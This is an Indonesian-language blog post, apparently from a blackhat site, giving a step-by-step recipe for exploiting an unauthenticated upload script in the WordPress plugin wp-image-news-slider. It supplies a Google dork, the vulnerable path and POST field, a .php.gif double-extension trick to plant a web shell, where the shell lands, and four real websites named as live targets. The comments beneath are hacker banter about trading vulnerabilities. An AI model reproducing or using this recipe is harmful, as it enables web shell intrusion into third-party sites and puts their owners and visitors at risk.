Dork: inurl:wp-content/plugins/wp-image-news-slider
Upload.php: wp-image-news-slider/js/swfupload/js/upload.php
Dorking dulu pake dork diatas pilih target, buka upload.php
Vuln: "No upload found in $_FILES for Filedata"
CSRF Online: Click Here
URL: http://site.com/[path]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
POST File: Filedata
Upload shell ext: .php.gif
shell location: /wp-content/uploads/random_name.php.gif
Live Target/Demo:
http://www.bittemilano.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://wfcj.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://namastefarms.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://tclecateau.free.fr/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
Web nya di kembangin lagi ea
ReplyDeleteidiot-blackhat.cf
Gw nemu celah
Saya developernya,celahnya dimana ya?
DeleteGw minta script web nya donk yang dulu
ReplyDeleteEntar gw kasih tahu vuln apa
Email aja ke idiotblackhat@gmail.com
DeleteThis comment has been removed by a blog administrator.
ReplyDeleteU sp y?
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDelete